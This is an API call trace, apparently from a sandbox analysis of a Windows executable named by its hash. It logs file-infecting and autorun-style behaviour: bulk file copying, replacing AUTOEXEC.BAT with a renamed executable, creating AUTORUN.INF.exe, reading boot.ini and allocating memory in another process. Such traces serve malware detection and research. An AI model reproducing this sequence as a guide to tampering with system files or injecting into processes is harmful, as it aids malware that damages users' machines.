"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->47554"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->47554"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000120","dwIoControlCode->0x006d0008","lpInBuffer->0x0049bc58","nInBufferSize->0x00000046","lpOutBuffer->0x00486100","nOutBufferSize->0x000000ee","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000118","hKey->0x00000120","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000118","lpValueName->Data"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000118","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->0x00000118","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000120","lpValueName->Generation"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","FAILURE","","hDevice->0x00000120","dwIoControlCode->0x006d0034","lpInBuffer->0x0049cb20","nInBufferSize->0x00000208","lpOutBuffer->0x00498e00","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000120","dwIoControlCode->0x006d0034","lpInBuffer->0x0049cb20","nInBufferSize->0x00000208","lpOutBuffer->0x0049cd30","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\AUTOEXEC.BAT"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\AUTOEXEC.BAT.exe","lpNewFileName->C:\AUTOEXEC.BAT"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\AutoRun.exe","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\AUTORUN.INF","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\AUTORUN.INF","dwDesiredAccess->GENERIC_READ"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\AUTORUN.INF.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","FAILURE","","hDevice->0x00000120","dwIoControlCode->0x006d0034","lpInBuffer->0x0049cb20","nInBufferSize->0x00000208","lpOutBuffer->0x00498e00","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000120","dwIoControlCode->0x006d0034","lpInBuffer->0x0049cb20","nInBufferSize->0x00000208","lpOutBuffer->0x0049cd58","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x00000120","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x00000120","lpValueName->BaseClass","dwType->1","lpData->Drive","cbData->12"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000128","hKey->0x00000120","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000128","lpValueName->Generation"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x7c9c0000","lpFileName->SHELL32.dll"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000012a","hKey->HKEY_CLASSES_ROOT","lpSubKey->Directory"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000012a","lpSubKey->CurVer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000122","hKey->0x0000012a","lpSubKey->(null)"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000128","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000128","lpValueName->DontShowSuperHidden"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000128","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000012c","hKey->0x00000128","lpSubKey->(null)"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000012c","lpValueName->ShellState"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000012c","lpValueName->ShellState"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000012c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x0000012c","lpValueName->ForceActiveDesktopOn"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->47554"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->47554"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->145"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->145"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->268"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->268"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\AUTORUN.INF"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->NoActiveDesktop"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\System"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->NoWebView"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->ClassicShell"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->SeparateProcess"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->NoNetCrawling"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\AUTORUN.INF.exe","lpNewFileName->C:\AUTORUN.INF"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\boot.ini","dwDesiredAccess->GENERIC_READ"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->268"
